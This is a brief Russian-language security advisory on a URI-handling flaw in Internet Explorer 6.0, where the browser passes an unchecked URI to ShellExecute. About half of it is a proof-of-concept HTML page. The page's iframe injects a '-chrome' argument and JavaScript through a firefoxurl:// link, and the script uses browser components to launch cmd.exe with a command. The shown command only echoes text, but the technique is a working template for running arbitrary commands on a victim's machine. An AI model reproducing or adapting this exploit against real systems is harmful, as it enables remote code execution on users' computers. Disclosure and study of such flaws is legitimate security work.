Программа: Microsoft Internet Explorer 6.0
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за того, что браузер выполняет ShellExecute с путем к EXE изображению и передает целый URI запрос без осуществления проверки ввода. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
<html>
<body>
<iframe src=’firefoxurl://larholm.com” -chrome “javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)+ String.fromCharCode(92)+'Windows'+
String.fromCharCode(92)+String.fromCharCode(92)+ 'System32'+String.fromCharCode(92)+
String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1']. createInstance(I.nsIProcess);
process.init(file);
process.run(true,['/k%20echo%20hello %20from%20larholm.com'],1);
'><
</body></html>
